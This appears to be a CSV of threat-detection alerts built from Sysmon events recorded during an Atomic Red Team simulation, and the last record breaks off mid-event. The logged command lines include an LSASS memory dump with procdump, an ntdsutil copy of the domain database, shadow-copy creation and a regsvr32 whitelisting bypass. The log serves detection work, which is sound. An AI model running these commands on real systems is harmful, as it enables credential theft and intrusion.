[T1059] Command-Line Interface,1563548034.976854,2019-07-19T18:53:54.976854+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:47.239318Z"">
</TimeCreated>
<EventRecordID>4048</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:47.230</Data>
<Data Name=""ProcessGuid"">747F3D96-D97B-5D31-0000-0010F0F03800</Data>
<Data Name=""ProcessId"">6888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:47.083068Z"">
</TimeCreated>
<EventRecordID>4047</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:47.056</Data>
<Data Name=""ProcessGuid"">747F3D96-D97B-5D31-0000-00109DEB3800</Data>
<Data Name=""ProcessId"">5788</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine""> /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
<Data Name=""ParentProcessId"">5828</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:47.083068Z"">
</TimeCreated>
<EventRecordID>4047</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:47.056</Data>
<Data Name=""ProcessGuid"">747F3D96-D97B-5D31-0000-00109DEB3800</Data>
<Data Name=""ProcessId"">5788</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine""> /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
<Data Name=""ParentProcessId"">5828</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:47.083068Z"">
</TimeCreated>
<EventRecordID>4047</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:47.056</Data>
<Data Name=""ProcessGuid"">747F3D96-D97B-5D31-0000-00109DEB3800</Data>
<Data Name=""ProcessId"">5788</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine""> /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D97A-5D31-0000-001019DE3800</Data>
<Data Name=""ParentProcessId"">5828</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\regsvr32.exe&quot; /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.989143,2019-07-19T19:11:26.989143+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;vssadmin.exe create shadow /for=C:&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.971596Z"">
</TimeCreated>
<EventRecordID>4128</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.958</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00100C3F4B00</Data>
<Data Name=""ProcessId"">5036</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;vssadmin.exe create shadow /for=C:&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.971596,2019-07-19T19:11:26.971596+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.884595Z"">
</TimeCreated>
<EventRecordID>4127</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.875</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00106D3A4B00</Data>
<Data Name=""ProcessId"">4208</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.884595,2019-07-19T19:11:26.884595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.852817Z"">
</TimeCreated>
<EventRecordID>4126</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.845</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-001059374B00</Data>
<Data Name=""ProcessId"">584</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.852817,2019-07-19T19:11:26.852817+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.686585Z"">
</TimeCreated>
<EventRecordID>4125</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.673</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00109A2F4B00</Data>
<Data Name=""ProcessId"">264</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp&quot; ) contain suspicious command ( procdump.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.642464Z"">
</TimeCreated>
<EventRecordID>4124</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.626</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00106E2C4B00</Data>
<Data Name=""ProcessId"">5488</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.642464Z"">
</TimeCreated>
<EventRecordID>4124</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.626</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-00106E2C4B00</Data>
<Data Name=""ProcessId"">5488</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
<Data Name=""ParentProcessId"">5840</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563549086.642464,2019-07-19T19:11:26.642464+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:11:26.549874Z"">
</TimeCreated>
<EventRecordID>4123</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:11:26.535</Data>
<Data Name=""ProcessGuid"">747F3D96-DD9E-5D31-0000-0010CB274B00</Data>
<Data Name=""ProcessId"">3016</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
